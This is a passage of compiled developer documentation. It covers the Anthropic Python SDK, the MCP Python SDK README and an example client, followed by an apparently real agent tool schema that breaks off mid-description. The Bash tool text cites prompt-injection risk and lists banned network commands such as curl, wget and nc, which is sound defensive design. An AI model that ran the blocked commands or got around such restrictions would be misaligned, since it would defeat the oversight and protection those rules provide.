- -As such, `.with_streaming_response` methods return a different [`APIResponse`](https://github.com/anthropics/anthropic-sdk-python/tree/main/src/anthropic/_response.py) object, and the async client returns an [`AsyncAPIResponse`](https://github.com/anthropics/anthropic-sdk-python/tree/main/src/anthropic/_response.py) object. - -```python -with client.messages.with_streaming_response.create( - max_tokens=1024, - messages=[ - { - "role": "user", - "content": "Hello, Claude", - } - ], - model="claude-3-5-sonnet-latest", -) as response: - print(response.headers.get("X-My-Header")) - - for line in response.iter_lines(): - print(line) -``` - -The context manager is required so that the response will reliably be closed. - -### Making custom/undocumented requests - -This library is typed for convenient access to the documented API. - -If you need to access undocumented endpoints, params, or response properties, the library can still be used. - -#### Undocumented endpoints - -To make requests to undocumented endpoints, you can make requests using `client.get`, `client.post`, and other -http verbs. Options on the client will be respected (such as retries) when making this request. - -```py -import httpx - -response = client.post( - "/foo", - cast_to=httpx.Response, - body={"my_param": True}, -) - -print(response.headers.get("x-foo")) -``` - -#### Undocumented request params - -If you want to explicitly send an extra param, you can do so with the `extra_query`, `extra_body`, and `extra_headers` request -options. - -#### Undocumented response properties - -To access undocumented response properties, you can access the extra fields like `response.unknown_prop`. You -can also get all the extra fields on the Pydantic model as a dict with -[`response.model_extra`](https://docs.pydantic.dev/latest/api/base_model/#pydantic.BaseModel.model_extra). 
- -### Configuring the HTTP client - -You can directly override the [httpx client](https://www.python-httpx.org/api/#client) to customize it for your use case, including: - -- Support for [proxies](https://www.python-httpx.org/advanced/proxies/) -- Custom [transports](https://www.python-httpx.org/advanced/transports/) -- Additional [advanced](https://www.python-httpx.org/advanced/clients/) functionality - -```python -import httpx -from anthropic import Anthropic, DefaultHttpxClient - -client = Anthropic( - # Or use the `ANTHROPIC_BASE_URL` env var - base_url="http://my.test.server.example.com:8083", - http_client=DefaultHttpxClient( - proxy="http://my.test.proxy.example.com", - transport=httpx.HTTPTransport(local_address="0.0.0.0"), - ), -) -``` - -You can also customize the client on a per-request basis by using `with_options()`: - -```python -client.with_options(http_client=DefaultHttpxClient(...)) -``` - -### Managing HTTP resources - -By default the library closes underlying HTTP connections whenever the client is [garbage collected](https://docs.python.org/3/reference/datamodel.html#object.__del__). You can manually close the client using the `.close()` method if desired, or with a context manager that closes when exiting. - -```py -from anthropic import Anthropic - -with Anthropic() as client: - # make requests here - ... - -# HTTP client is now closed -``` - -## Versioning - -This package generally follows [SemVer](https://semver.org/spec/v2.0.0.html) conventions, though certain backwards-incompatible changes may be released as minor versions: - -1. Changes that only affect static types, without breaking runtime behavior. -2. Changes to library internals which are technically public but not intended or documented for external use. _(Please open a GitHub issue to let us know if you are relying on such internals.)_ -3. Changes that we do not expect to impact the vast majority of users in practice. 
- -We take backwards-compatibility seriously and work hard to ensure you can rely on a smooth upgrade experience. - -We are keen for your feedback; please open an [issue](https://www.github.com/anthropics/anthropic-sdk-python/issues) with questions, bugs, or suggestions. - -### Determining the installed version - -If you've upgraded to the latest version but aren't seeing any new features you were expecting then your python environment is likely still using an older version. - -You can determine the version that is being used at runtime with: - -```py -import anthropic -print(anthropic.__version__) -``` - -## Requirements - -Python 3.8 or higher. - -## Contributing - -See [the contributing documentation](./CONTRIBUTING.md). -``` - - -MCP Python SDK README: -# MCP Python SDK - -
- -Python implementation of the Model Context Protocol (MCP) - -[![PyPI][pypi-badge]][pypi-url] -[![MIT licensed][mit-badge]][mit-url] -[![Python Version][python-badge]][python-url] -[![Documentation][docs-badge]][docs-url] -[![Specification][spec-badge]][spec-url] -[![GitHub Discussions][discussions-badge]][discussions-url] - -
- - -## Table of Contents - -- [MCP Python SDK](#mcp-python-sdk) - - [Overview](#overview) - - [Installation](#installation) - - [Adding MCP to your python project](#adding-mcp-to-your-python-project) - - [Running the standalone MCP development tools](#running-the-standalone-mcp-development-tools) - - [Quickstart](#quickstart) - - [What is MCP?](#what-is-mcp) - - [Core Concepts](#core-concepts) - - [Server](#server) - - [Resources](#resources) - - [Tools](#tools) - - [Prompts](#prompts) - - [Images](#images) - - [Context](#context) - - [Running Your Server](#running-your-server) - - [Development Mode](#development-mode) - - [Claude Desktop Integration](#claude-desktop-integration) - - [Direct Execution](#direct-execution) - - [Mounting to an Existing ASGI Server](#mounting-to-an-existing-asgi-server) - - [Examples](#examples) - - [Echo Server](#echo-server) - - [SQLite Explorer](#sqlite-explorer) - - [Advanced Usage](#advanced-usage) - - [Low-Level Server](#low-level-server) - - [Writing MCP Clients](#writing-mcp-clients) - - [MCP Primitives](#mcp-primitives) - - [Server Capabilities](#server-capabilities) - - [Documentation](#documentation) - - [Contributing](#contributing) - - [License](#license) - -[pypi-badge]: https://img.shields.io/pypi/v/mcp.svg -[pypi-url]: https://pypi.org/project/mcp/ -[mit-badge]: https://img.shields.io/pypi/l/mcp.svg -[mit-url]: https://github.com/modelcontextprotocol/python-sdk/blob/main/LICENSE -[python-badge]: https://img.shields.io/pypi/pyversions/mcp.svg -[python-url]: https://www.python.org/downloads/ -[docs-badge]: https://img.shields.io/badge/docs-modelcontextprotocol.io-blue.svg -[docs-url]: https://modelcontextprotocol.io -[spec-badge]: https://img.shields.io/badge/spec-spec.modelcontextprotocol.io-blue.svg -[spec-url]: https://spec.modelcontextprotocol.io -[discussions-badge]: https://img.shields.io/github/discussions/modelcontextprotocol/python-sdk -[discussions-url]: 
https://github.com/modelcontextprotocol/python-sdk/discussions - -## Overview - -The Model Context Protocol allows applications to provide context for LLMs in a standardized way, separating the concerns of providing context from the actual LLM interaction. This Python SDK implements the full MCP specification, making it easy to: - -- Build MCP clients that can connect to any MCP server -- Create MCP servers that expose resources, prompts and tools -- Use standard transports like stdio and SSE -- Handle all MCP protocol messages and lifecycle events - -## Installation - -### Adding MCP to your python project - -We recommend using [uv](https://docs.astral.sh/uv/) to manage your Python projects. - -If you haven't created a uv-managed project yet, create one: - - ```bash - uv init mcp-server-demo - cd mcp-server-demo - ``` - - Then add MCP to your project dependencies: - - ```bash - uv add "mcp[cli]" - ``` - -Alternatively, for projects using pip for dependencies: -```bash -pip install "mcp[cli]" -``` - -### Running the standalone MCP development tools - -To run the mcp command with uv: - -```bash -uv run mcp -``` - -## Quickstart - -Let's create a simple MCP server that exposes a calculator tool and some data: - -```python -# server.py -from mcp.server.fastmcp import FastMCP - -# Create an MCP server -mcp = FastMCP("Demo") - - -# Add an addition tool -@mcp.tool() -def add(a: int, b: int) -> int: - """Add two numbers""" - return a + b - - -# Add a dynamic greeting resource -@mcp.resource("greeting://{name}") -def get_greeting(name: str) -> str: - """Get a personalized greeting""" - return f"Hello, {name}!" -``` - -You can install this server in [Claude Desktop](https://claude.ai/download) and interact with it right away by running: -```bash -mcp install server.py -``` - -Alternatively, you can test it with the MCP Inspector: -```bash -mcp dev server.py -``` - -## What is MCP? 
- -The [Model Context Protocol (MCP)](https://modelcontextprotocol.io) lets you build servers that expose data and functionality to LLM applications in a secure, standardized way. Think of it like a web API, but specifically designed for LLM interactions. MCP servers can: - -- Expose data through **Resources** (think of these sort of like GET endpoints; they are used to load information into the LLM's context) -- Provide functionality through **Tools** (sort of like POST endpoints; they are used to execute code or otherwise produce a side effect) -- Define interaction patterns through **Prompts** (reusable templates for LLM interactions) -- And more! - -## Core Concepts - -### Server - -The FastMCP server is your core interface to the MCP protocol. It handles connection management, protocol compliance, and message routing: - -```python -# Add lifespan support for startup/shutdown with strong typing -from contextlib import asynccontextmanager -from collections.abc import AsyncIterator -from dataclasses import dataclass - -from fake_database import Database # Replace with your actual DB type - -from mcp.server.fastmcp import Context, FastMCP - -# Create a named server -mcp = FastMCP("My App") - -# Specify dependencies for deployment and development -mcp = FastMCP("My App", dependencies=["pandas", "numpy"]) - - -@dataclass -class AppContext: - db: Database - - -@asynccontextmanager -async def app_lifespan(server: FastMCP) -> AsyncIterator[AppContext]: - """Manage application lifecycle with type-safe context""" - # Initialize on startup - db = await Database.connect() - try: - yield AppContext(db=db) - finally: - # Cleanup on shutdown - await db.disconnect() - - -# Pass lifespan to server -mcp = FastMCP("My App", lifespan=app_lifespan) - - -# Access type-safe lifespan context in tools -@mcp.tool() -def query_db(ctx: Context) -> str: - """Tool that uses initialized resources""" - db = ctx.request_context.lifespan_context["db"] - return db.query() -``` - -### Resources - 
-Resources are how you expose data to LLMs. They're similar to GET endpoints in a REST API - they provide data but shouldn't perform significant computation or have side effects: - -```python -from mcp.server.fastmcp import FastMCP - -mcp = FastMCP("My App") - - -@mcp.resource("config://app") -def get_config() -> str: - """Static configuration data""" - return "App configuration here" - - -@mcp.resource("users://{user_id}/profile") -def get_user_profile(user_id: str) -> str: - """Dynamic user data""" - return f"Profile data for user {user_id}" -``` - -### Tools - -Tools let LLMs take actions through your server. Unlike resources, tools are expected to perform computation and have side effects: - -```python -import httpx -from mcp.server.fastmcp import FastMCP - -mcp = FastMCP("My App") - - -@mcp.tool() -def calculate_bmi(weight_kg: float, height_m: float) -> float: - """Calculate BMI given weight in kg and height in meters""" - return weight_kg / (height_m**2) - - -@mcp.tool() -async def fetch_weather(city: str) -> str: - """Fetch current weather for a city""" - async with httpx.AsyncClient() as client: - response = await client.get(f"https://api.weather.com/{city}") - return response.text -``` - -### Prompts - -Prompts are reusable templates that help LLMs interact with your server effectively: - -```python -from mcp.server.fastmcp import FastMCP -from mcp.server.fastmcp.prompts import base - -mcp = FastMCP("My App") - - -@mcp.prompt() -def review_code(code: str) -> str: - return f"Please review this code:\n\n{code}" - - -@mcp.prompt() -def debug_error(error: str) -> list[base.Message]: - return [ - base.UserMessage("I'm seeing this error:"), - base.UserMessage(error), - base.AssistantMessage("I'll help debug that. 
What have you tried so far?"), - ] -``` - -### Images - -FastMCP provides an `Image` class that automatically handles image data: - -```python -from mcp.server.fastmcp import FastMCP, Image -from PIL import Image as PILImage - -mcp = FastMCP("My App") - - -@mcp.tool() -def create_thumbnail(image_path: str) -> Image: - """Create a thumbnail from an image""" - img = PILImage.open(image_path) - img.thumbnail((100, 100)) - return Image(data=img.tobytes(), format="png") -``` - -### Context - -The Context object gives your tools and resources access to MCP capabilities: - -```python -from mcp.server.fastmcp import FastMCP, Context - -mcp = FastMCP("My App") - - -@mcp.tool() -async def long_task(files: list[str], ctx: Context) -> str: - """Process multiple files with progress tracking""" - for i, file in enumerate(files): - ctx.info(f"Processing {file}") - await ctx.report_progress(i, len(files)) - data, mime_type = await ctx.read_resource(f"file://{file}") - return "Processing complete" -``` - -## Running Your Server - -### Development Mode - -The fastest way to test and debug your server is with the MCP Inspector: - -```bash -mcp dev server.py - -# Add dependencies -mcp dev server.py --with pandas --with numpy - -# Mount local code -mcp dev server.py --with-editable . -``` - -### Claude Desktop Integration - -Once your server is ready, install it in Claude Desktop: - -```bash -mcp install server.py - -# Custom name -mcp install server.py --name "My Analytics Server" - -# Environment variables -mcp install server.py -v API_KEY=abc123 -v DB_URL=postgres://... 
-mcp install server.py -f .env -``` - -### Direct Execution - -For advanced scenarios like custom deployments: - -```python -from mcp.server.fastmcp import FastMCP - -mcp = FastMCP("My App") - -if __name__ == "__main__": - mcp.run() -``` - -Run it with: -```bash -python server.py -# or -mcp run server.py -``` - -### Mounting to an Existing ASGI Server - -You can mount the SSE server to an existing ASGI server using the `sse_app` method. This allows you to integrate the SSE server with other ASGI applications. - -```python -from starlette.applications import Starlette -from starlette.routing import Mount, Host -from mcp.server.fastmcp import FastMCP - - -mcp = FastMCP("My App") - -# Mount the SSE server to the existing ASGI server -app = Starlette( - routes=[ - Mount('/', app=mcp.sse_app()), - ] -) - -# or dynamically mount as host -app.router.routes.append(Host('mcp.acme.corp', app=mcp.sse_app())) -``` - -For more information on mounting applications in Starlette, see the [Starlette documentation](https://www.starlette.io/routing/#submounting-routes). 
- -## Examples - -### Echo Server - -A simple server demonstrating resources, tools, and prompts: - -```python -from mcp.server.fastmcp import FastMCP - -mcp = FastMCP("Echo") - - -@mcp.resource("echo://{message}") -def echo_resource(message: str) -> str: - """Echo a message as a resource""" - return f"Resource echo: {message}" - - -@mcp.tool() -def echo_tool(message: str) -> str: - """Echo a message as a tool""" - return f"Tool echo: {message}" - - -@mcp.prompt() -def echo_prompt(message: str) -> str: - """Create an echo prompt""" - return f"Please process this message: {message}" -``` - -### SQLite Explorer - -A more complex example showing database integration: - -```python -import sqlite3 - -from mcp.server.fastmcp import FastMCP - -mcp = FastMCP("SQLite Explorer") - - -@mcp.resource("schema://main") -def get_schema() -> str: - """Provide the database schema as a resource""" - conn = sqlite3.connect("database.db") - schema = conn.execute("SELECT sql FROM sqlite_master WHERE type='table'").fetchall() - return "\n".join(sql[0] for sql in schema if sql[0]) - - -@mcp.tool() -def query_data(sql: str) -> str: - """Execute SQL queries safely""" - conn = sqlite3.connect("database.db") - try: - result = conn.execute(sql).fetchall() - return "\n".join(str(row) for row in result) - except Exception as e: - return f"Error: {str(e)}" -``` - -## Advanced Usage - -### Low-Level Server - -For more control, you can use the low-level server implementation directly. 
This gives you full access to the protocol and allows you to customize every aspect of your server, including lifecycle management through the lifespan API: - -```python -from contextlib import asynccontextmanager -from collections.abc import AsyncIterator - -from fake_database import Database # Replace with your actual DB type - -from mcp.server import Server - - -@asynccontextmanager -async def server_lifespan(server: Server) -> AsyncIterator[dict]: - """Manage server startup and shutdown lifecycle.""" - # Initialize resources on startup - db = await Database.connect() - try: - yield {"db": db} - finally: - # Clean up on shutdown - await db.disconnect() - - -# Pass lifespan to server -server = Server("example-server", lifespan=server_lifespan) - - -# Access lifespan context in handlers -@server.call_tool() -async def query_db(name: str, arguments: dict) -> list: - ctx = server.request_context - db = ctx.lifespan_context["db"] - return await db.query(arguments["query"]) -``` - -The lifespan API provides: -- A way to initialize resources when the server starts and clean them up when it stops -- Access to initialized resources through the request context in handlers -- Type-safe context passing between lifespan and request handlers - -```python -import mcp.server.stdio -import mcp.types as types -from mcp.server.lowlevel import NotificationOptions, Server -from mcp.server.models import InitializationOptions - -# Create a server instance -server = Server("example-server") - - -@server.list_prompts() -async def handle_list_prompts() -> list[types.Prompt]: - return [ - types.Prompt( - name="example-prompt", - description="An example prompt template", - arguments=[ - types.PromptArgument( - name="arg1", description="Example argument", required=True - ) - ], - ) - ] - - -@server.get_prompt() -async def handle_get_prompt( - name: str, arguments: dict[str, str] | None -) -> types.GetPromptResult: - if name != "example-prompt": - raise ValueError(f"Unknown prompt: {name}") 
- - return types.GetPromptResult( - description="Example prompt", - messages=[ - types.PromptMessage( - role="user", - content=types.TextContent(type="text", text="Example prompt text"), - ) - ], - ) - - -async def run(): - async with mcp.server.stdio.stdio_server() as (read_stream, write_stream): - await server.run( - read_stream, - write_stream, - InitializationOptions( - server_name="example", - server_version="0.1.0", - capabilities=server.get_capabilities( - notification_options=NotificationOptions(), - experimental_capabilities={}, - ), - ), - ) - - -if __name__ == "__main__": - import asyncio - - asyncio.run(run()) -``` - -### Writing MCP Clients - -The SDK provides a high-level client interface for connecting to MCP servers: - -```python -from mcp import ClientSession, StdioServerParameters, types -from mcp.client.stdio import stdio_client - -# Create server parameters for stdio connection -server_params = StdioServerParameters( - command="python", # Executable - args=["example_server.py"], # Optional command line arguments - env=None, # Optional environment variables -) - - -# Optional: create a sampling callback -async def handle_sampling_message( - message: types.CreateMessageRequestParams, -) -> types.CreateMessageResult: - return types.CreateMessageResult( - role="assistant", - content=types.TextContent( - type="text", - text="Hello, world! 
from model", - ), - model="gpt-3.5-turbo", - stopReason="endTurn", - ) - - -async def run(): - async with stdio_client(server_params) as (read, write): - async with ClientSession( - read, write, sampling_callback=handle_sampling_message - ) as session: - # Initialize the connection - await session.initialize() - - # List available prompts - prompts = await session.list_prompts() - - # Get a prompt - prompt = await session.get_prompt( - "example-prompt", arguments={"arg1": "value"} - ) - - # List available resources - resources = await session.list_resources() - - # List available tools - tools = await session.list_tools() - - # Read a resource - content, mime_type = await session.read_resource("file://some/path") - - # Call a tool - result = await session.call_tool("tool-name", arguments={"arg1": "value"}) - - -if __name__ == "__main__": - import asyncio - - asyncio.run(run()) -``` - -### MCP Primitives - -The MCP protocol defines three core primitives that servers can implement: - -| Primitive | Control | Description | Example Use | -|-----------|-----------------------|-----------------------------------------------------|------------------------------| -| Prompts | User-controlled | Interactive templates invoked by user choice | Slash commands, menu options | -| Resources | Application-controlled| Contextual data managed by the client application | File contents, API responses | -| Tools | Model-controlled | Functions exposed to the LLM to take actions | API calls, data updates | - -### Server Capabilities - -MCP servers declare capabilities during initialization: - -| Capability | Feature Flag | Description | -|-------------|------------------------------|------------------------------------| -| `prompts` | `listChanged` | Prompt template management | -| `resources` | `subscribe`
`listChanged`| Resource exposure and updates | -| `tools` | `listChanged` | Tool discovery and execution | -| `logging` | - | Server logging configuration | -| `completion`| - | Argument completion suggestions | - -## Documentation - -- [Model Context Protocol documentation](https://modelcontextprotocol.io) -- [Model Context Protocol specification](https://spec.modelcontextprotocol.io) -- [Officially supported servers](https://github.com/modelcontextprotocol/servers) - -## Contributing - -We are passionate about supporting contributors of all levels of experience and would love to see you get involved in the project. See the [contributing guide](CONTRIBUTING.md) to get started. - -## License - -This project is licensed under the MIT License - see the LICENSE file for details. - - -MCP Python SDK example of an MCP client: -```py -import asyncio -import json -import logging -import os -import shutil -from contextlib import AsyncExitStack -from typing import Any - -import httpx -from dotenv import load_dotenv -from mcp import ClientSession, StdioServerParameters -from mcp.client.stdio import stdio_client - -# Configure logging -logging.basicConfig( - level=logging.INFO, format="%(asctime)s - %(levelname)s - %(message)s" -) - - -class Configuration: - """Manages configuration and environment variables for the MCP client.""" - - def __init__(self) -> None: - """Initialize configuration with environment variables.""" - self.load_env() - self.api_key = os.getenv("LLM_API_KEY") - - @staticmethod - def load_env() -> None: - """Load environment variables from .env file.""" - load_dotenv() - - @staticmethod - def load_config(file_path: str) -> dict[str, Any]: - """Load server configuration from JSON file. - - Args: - file_path: Path to the JSON configuration file. - - Returns: - Dict containing server configuration. - - Raises: - FileNotFoundError: If configuration file doesn't exist. - JSONDecodeError: If configuration file is invalid JSON. 
- """ - with open(file_path, "r") as f: - return json.load(f) - - @property - def llm_api_key(self) -> str: - """Get the LLM API key. - - Returns: - The API key as a string. - - Raises: - ValueError: If the API key is not found in environment variables. - """ - if not self.api_key: - raise ValueError("LLM_API_KEY not found in environment variables") - return self.api_key - - -class Server: - """Manages MCP server connections and tool execution.""" - - def __init__(self, name: str, config: dict[str, Any]) -> None: - self.name: str = name - self.config: dict[str, Any] = config - self.stdio_context: Any | None = None - self.session: ClientSession | None = None - self._cleanup_lock: asyncio.Lock = asyncio.Lock() - self.exit_stack: AsyncExitStack = AsyncExitStack() - - async def initialize(self) -> None: - """Initialize the server connection.""" - command = ( - shutil.which("npx") - if self.config["command"] == "npx" - else self.config["command"] - ) - if command is None: - raise ValueError("The command must be a valid string and cannot be None.") - - server_params = StdioServerParameters( - command=command, - args=self.config["args"], - env={**os.environ, **self.config["env"]} - if self.config.get("env") - else None, - ) - try: - stdio_transport = await self.exit_stack.enter_async_context( - stdio_client(server_params) - ) - read, write = stdio_transport - session = await self.exit_stack.enter_async_context( - ClientSession(read, write) - ) - await session.initialize() - self.session = session - except Exception as e: - logging.error(f"Error initializing server {self.name}: {e}") - await self.cleanup() - raise - - async def list_tools(self) -> list[Any]: - """List available tools from the server. - - Returns: - A list of available tools. - - Raises: - RuntimeError: If the server is not initialized. 
- """ - if not self.session: - raise RuntimeError(f"Server {self.name} not initialized") - - tools_response = await self.session.list_tools() - tools = [] - - for item in tools_response: - if isinstance(item, tuple) and item[0] == "tools": - for tool in item[1]: - tools.append(Tool(tool.name, tool.description, tool.inputSchema)) - - return tools - - async def execute_tool( - self, - tool_name: str, - arguments: dict[str, Any], - retries: int = 2, - delay: float = 1.0, - ) -> Any: - """Execute a tool with retry mechanism. - - Args: - tool_name: Name of the tool to execute. - arguments: Tool arguments. - retries: Number of retry attempts. - delay: Delay between retries in seconds. - - Returns: - Tool execution result. - - Raises: - RuntimeError: If server is not initialized. - Exception: If tool execution fails after all retries. - """ - if not self.session: - raise RuntimeError(f"Server {self.name} not initialized") - - attempt = 0 - while attempt < retries: - try: - logging.info(f"Executing {tool_name}...") - result = await self.session.call_tool(tool_name, arguments) - - return result - - except Exception as e: - attempt += 1 - logging.warning( - f"Error executing tool: {e}. Attempt {attempt} of {retries}." - ) - if attempt < retries: - logging.info(f"Retrying in {delay} seconds...") - await asyncio.sleep(delay) - else: - logging.error("Max retries reached. 
Failing.") - raise - - async def cleanup(self) -> None: - """Clean up server resources.""" - async with self._cleanup_lock: - try: - await self.exit_stack.aclose() - self.session = None - self.stdio_context = None - except Exception as e: - logging.error(f"Error during cleanup of server {self.name}: {e}") - - -class Tool: - """Represents a tool with its properties and formatting.""" - - def __init__( - self, name: str, description: str, input_schema: dict[str, Any] - ) -> None: - self.name: str = name - self.description: str = description - self.input_schema: dict[str, Any] = input_schema - - def format_for_llm(self) -> str: - """Format tool information for LLM. - - Returns: - A formatted string describing the tool. - """ - args_desc = [] - if "properties" in self.input_schema: - for param_name, param_info in self.input_schema["properties"].items(): - arg_desc = ( - f"- {param_name}: {param_info.get('description', 'No description')}" - ) - if param_name in self.input_schema.get("required", []): - arg_desc += " (required)" - args_desc.append(arg_desc) - - return f""" -Tool: {self.name} -Description: {self.description} -Arguments: -{chr(10).join(args_desc)} -""" - - -class LLMClient: - """Manages communication with the LLM provider.""" - - def __init__(self, api_key: str) -> None: - self.api_key: str = api_key - - def get_response(self, messages: list[dict[str, str]]) -> str: - """Get a response from the LLM. - - Args: - messages: A list of message dictionaries. - - Returns: - The LLM's response as a string. - - Raises: - httpx.RequestError: If the request to the LLM fails. 
- """ - url = "https://api.groq.com/openai/v1/chat/completions" - - headers = { - "Content-Type": "application/json", - "Authorization": f"Bearer {self.api_key}", - } - payload = { - "messages": messages, - "model": "llama-3.2-90b-vision-preview", - "temperature": 0.7, - "max_tokens": 4096, - "top_p": 1, - "stream": False, - "stop": None, - } - - try: - with httpx.Client() as client: - response = client.post(url, headers=headers, json=payload) - response.raise_for_status() - data = response.json() - return data["choices"][0]["message"]["content"] - - except httpx.RequestError as e: - error_message = f"Error getting LLM response: {str(e)}" - logging.error(error_message) - - if isinstance(e, httpx.HTTPStatusError): - status_code = e.response.status_code - logging.error(f"Status code: {status_code}") - logging.error(f"Response details: {e.response.text}") - - return ( - f"I encountered an error: {error_message}. " - "Please try again or rephrase your request." - ) - - -class ChatSession: - """Orchestrates the interaction between user, LLM, and tools.""" - - def __init__(self, servers: list[Server], llm_client: LLMClient) -> None: - self.servers: list[Server] = servers - self.llm_client: LLMClient = llm_client - - async def cleanup_servers(self) -> None: - """Clean up all servers properly.""" - cleanup_tasks = [] - for server in self.servers: - cleanup_tasks.append(asyncio.create_task(server.cleanup())) - - if cleanup_tasks: - try: - await asyncio.gather(*cleanup_tasks, return_exceptions=True) - except Exception as e: - logging.warning(f"Warning during final cleanup: {e}") - - async def process_llm_response(self, llm_response: str) -> str: - """Process the LLM response and execute tools if needed. - - Args: - llm_response: The response from the LLM. - - Returns: - The result of tool execution or the original response. 
- """ - import json - - try: - tool_call = json.loads(llm_response) - if "tool" in tool_call and "arguments" in tool_call: - logging.info(f"Executing tool: {tool_call['tool']}") - logging.info(f"With arguments: {tool_call['arguments']}") - - for server in self.servers: - tools = await server.list_tools() - if any(tool.name == tool_call["tool"] for tool in tools): - try: - result = await server.execute_tool( - tool_call["tool"], tool_call["arguments"] - ) - - if isinstance(result, dict) and "progress" in result: - progress = result["progress"] - total = result["total"] - percentage = (progress / total) * 100 - logging.info( - f"Progress: {progress}/{total} " - f"({percentage:.1f}%)" - ) - - return f"Tool execution result: {result}" - except Exception as e: - error_msg = f"Error executing tool: {str(e)}" - logging.error(error_msg) - return error_msg - - return f"No server found with tool: {tool_call['tool']}" - return llm_response - except json.JSONDecodeError: - return llm_response - - async def start(self) -> None: - """Main chat session handler.""" - try: - for server in self.servers: - try: - await server.initialize() - except Exception as e: - logging.error(f"Failed to initialize server: {e}") - await self.cleanup_servers() - return - - all_tools = [] - for server in self.servers: - tools = await server.list_tools() - all_tools.extend(tools) - - tools_description = "\n".join([tool.format_for_llm() for tool in all_tools]) - - system_message = ( - "You are a helpful assistant with access to these tools:\n\n" - f"{tools_description}\n" - "Choose the appropriate tool based on the user's question. " - "If no tool is needed, reply directly.\n\n" - "IMPORTANT: When you need to use a tool, you must ONLY respond with " - "the exact JSON object format below, nothing else:\n" - "{\n" - ' "tool": "tool-name",\n' - ' "arguments": {\n' - ' "argument-name": "value"\n' - " }\n" - "}\n\n" - "After receiving a tool's response:\n" - "1. 
Transform the raw data into a natural, conversational response\n" - "2. Keep responses concise but informative\n" - "3. Focus on the most relevant information\n" - "4. Use appropriate context from the user's question\n" - "5. Avoid simply repeating the raw data\n\n" - "Please use only the tools that are explicitly defined above." - ) - - messages = [{"role": "system", "content": system_message}] - - while True: - try: - user_input = input("You: ").strip().lower() - if user_input in ["quit", "exit"]: - logging.info("\nExiting...") - break - - messages.append({"role": "user", "content": user_input}) - - llm_response = self.llm_client.get_response(messages) - logging.info("\nAssistant: %s", llm_response) - - result = await self.process_llm_response(llm_response) - - if result != llm_response: - messages.append({"role": "assistant", "content": llm_response}) - messages.append({"role": "system", "content": result}) - - final_response = self.llm_client.get_response(messages) - logging.info("\nFinal response: %s", final_response) - messages.append( - {"role": "assistant", "content": final_response} - ) - else: - messages.append({"role": "assistant", "content": llm_response}) - - except KeyboardInterrupt: - logging.info("\nExiting...") - break - - finally: - await self.cleanup_servers() - - -async def main() -> None: - """Initialize and run the chat session.""" - config = Configuration() - server_config = config.load_config("servers_config.json") - servers = [ - Server(name, srv_config) - for name, srv_config in server_config["mcpServers"].items() - ] - llm_client = LLMClient(config.llm_api_key) - chat_session = ChatSession(servers, llm_client) - await chat_session.start() - - -if __name__ == "__main__": - asyncio.run(main()) -``` - - - - -JSON schema for Claude Code tools available via MCP: -```json -{ - "jsonrpc": "2.0", - "id": 1, - "result": { - "tools": [ - { - "name": "dispatch_agent", - "description": "Launch a new task", - "inputSchema": { - "type": "object", - 
"properties": { - "prompt": { - "type": "string", - "description": "The task for the agent to perform" - } - }, - "required": [ - "prompt" - ], - "additionalProperties": false, - "$schema": "http://json-schema.org/draft-07/schema#" - } - }, - { - "name": "Bash", - "description": "Run shell command", - "inputSchema": { - "type": "object", - "properties": { - "command": { - "type": "string", - "description": "The command to execute" - }, - "timeout": { - "type": "number", - "description": "Optional timeout in milliseconds (max 600000)" - }, - "description": { - "type": "string", - "description": " Clear, concise description of what this command does in 5-10 words. Examples:\nInput: ls\nOutput: Lists files in current directory\n\nInput: git status\nOutput: Shows working tree status\n\nInput: npm install\nOutput: Installs package dependencies\n\nInput: mkdir foo\nOutput: Creates directory 'foo'" - } - }, - "required": [ - "command" - ], - "additionalProperties": false, - "$schema": "http://json-schema.org/draft-07/schema#" - } - }, - { - "name": "BatchTool", - "description": "\n- Batch execution tool that runs multiple tool invocations in a single request\n- Tools are executed in parallel when possible, and otherwise serially\n- Takes a list of tool invocations (tool_name and input pairs)\n- Returns the collected results from all invocations\n- Use this tool when you need to run multiple independent tool operations at once -- it is awesome for speeding up your workflow, reducing both context usage and latency\n- Each tool will respect its own permissions and validation rules\n- The tool's outputs are NOT shown to the user; to answer the user's query, you MUST send a message with the results after the tool call completes, otherwise the user will not see the results\n\nAvailable tools:\nTool: dispatch_agent\nArguments: prompt: string \"The task for the agent to perform\"\nUsage: Launch a new agent that has access to the following tools: View, GlobTool, GrepTool, LS, 
ReadNotebook, WebFetchTool. When you are searching for a keyword or file and are not confident that you will find the right match in the first few tries, use the Agent tool to perform the search for you.\n\nWhen to use the Agent tool:\n- If you are searching for a keyword like \"config\" or \"logger\", or for questions like \"which file does X?\", the Agent tool is strongly recommended\n\nWhen NOT to use the Agent tool:\n- If you want to read a specific file path, use the View or GlobTool tool instead of the Agent tool, to find the match more quickly\n- If you are searching for a specific class definition like \"class Foo\", use the GlobTool tool instead, to find the match more quickly\n- If you are searching for code within a specific file or set of 2-3 files, use the View tool instead of the Agent tool, to find the match more quickly\n\nUsage notes:\n1. Launch multiple agents concurrently whenever possible, to maximize performance; to do that, use a single message with multiple tool uses\n2. When the agent is done, it will return a single message back to you. The result returned by the agent is not visible to the user. To show the user the result, you should send a text message back to the user with a concise summary of the result.\n3. Each agent invocation is stateless. You will not be able to send additional messages to the agent, nor will the agent be able to communicate with you outside of its final report. Therefore, your prompt should contain a highly detailed task description for the agent to perform autonomously and you should specify exactly what information the agent should return back to you in its final and only message to you.\n4. The agent's outputs should generally be trusted\n5. IMPORTANT: The agent can not use Bash, Replace, Edit, NotebookEditCell, so can not modify files. 
If you want to use these tools, use them directly instead of going through the agent.\n---Tool: Bash\nArguments: command: string \"The command to execute\", [optional] timeout: number \"Optional timeout in milliseconds (max 600000)\", [optional] description: string \" Clear, concise description of what this command does in 5-10 words. Examples:\nInput: ls\nOutput: Lists files in current directory\n\nInput: git status\nOutput: Shows working tree status\n\nInput: npm install\nOutput: Installs package dependencies\n\nInput: mkdir foo\nOutput: Creates directory 'foo'\"\nUsage: Executes a given bash command in a persistent shell session with optional timeout, ensuring proper handling and security measures.\n\nBefore executing the command, please follow these steps:\n\n1. Directory Verification:\n - If the command will create new directories or files, first use the LS tool to verify the parent directory exists and is the correct location\n - For example, before running \"mkdir foo/bar\", first use LS to check that \"foo\" exists and is the intended parent directory\n\n2. Security Check:\n - For security and to limit the threat of a prompt injection attack, some commands are limited or banned. If you use a disallowed command, you will receive an error message explaining the restriction. Explain the error to the User.\n - Verify that the command is not one of the banned commands: alias, curl, curlie, wget, axel, aria2c, nc, telnet, lynx, w3m, links, httpie, xh, http-prompt, chrome, firefox, safari.\n\n3. Command Execution:\n - After ensuring proper quoting, execute the command.\n - Capture the output of the command.\n\nUsage notes:\n - The command argument is required.\n - You can 